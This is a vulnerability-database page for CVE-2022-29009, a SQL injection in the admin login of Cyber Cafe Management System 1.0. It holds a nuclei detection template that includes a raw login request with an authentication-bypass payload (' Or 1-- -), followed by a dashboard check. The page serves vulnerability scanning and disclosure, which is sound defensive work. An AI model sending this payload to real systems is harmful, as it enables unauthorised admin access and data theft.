Lucene search
K

Cyber Cafe Management System 1.0 - SQL Injection

🗓️ 29 May 2026 03:59:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Cyber Cafe Management System 1.0 - SQL Injection vulnerability in Admin panel

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-29009
11 May 202214:15
attackerkb
Circl
CVE-2022-29009
11 May 202218:35
circl
CNNVD
Cyber Cafe Management System SQL注入漏洞
11 May 202200:00
cnnvd
CNVD
Cyber Cafe Management System SQL Injection Vulnerability
13 May 202200:00
cnvd
CVE
CVE-2022-29009
11 May 202213:08
cve
Cvelist
CVE-2022-29009
11 May 202213:08
cvelist
NVD
CVE-2022-29009
11 May 202214:15
nvd
OSV
CVE-2022-29009
11 May 202214:15
osv
Prion
Sql injection
11 May 202214:15
prion
Positive Technologies
PT-2022-19363 · Unknown · Cyber Cafe Management System Project
11 May 202200:00
ptsecurity
Rows per page
id: CVE-2022-29009

info:
  name: Cyber Cafe Management System 1.0 - SQL Injection
  author: TenBird
  severity: critical
  description: |
    Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50355
    - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29009
    - https://github.com/sudoninja-noob/CVE-2022-29009/blob/main/CVE-2022-29009.txt
    - https://github.com/manas3c/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29009
    cwe-id: CWE-89
    epss-score: 0.85946
    epss-percentile: 0.99404
    cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: cyber_cafe_management_system
  tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul,vuln

http:
  - raw:
      - |
        POST /ccms/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=%27+Or+1--+-&password=1&login=
      - |
        GET /ccms/dashboard.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'CCMS Admin Dashboard'
          - 'CCMS ADMIN | Admin'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210097d32e18528e364a38854fc54b6636a4a3dd4ca1318964d33bbc2dd411f0ca16022001d9a96f837a8f92d0f34c0a28db5e1442d8129aad2954bf33cc089ff785b54a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.85946
33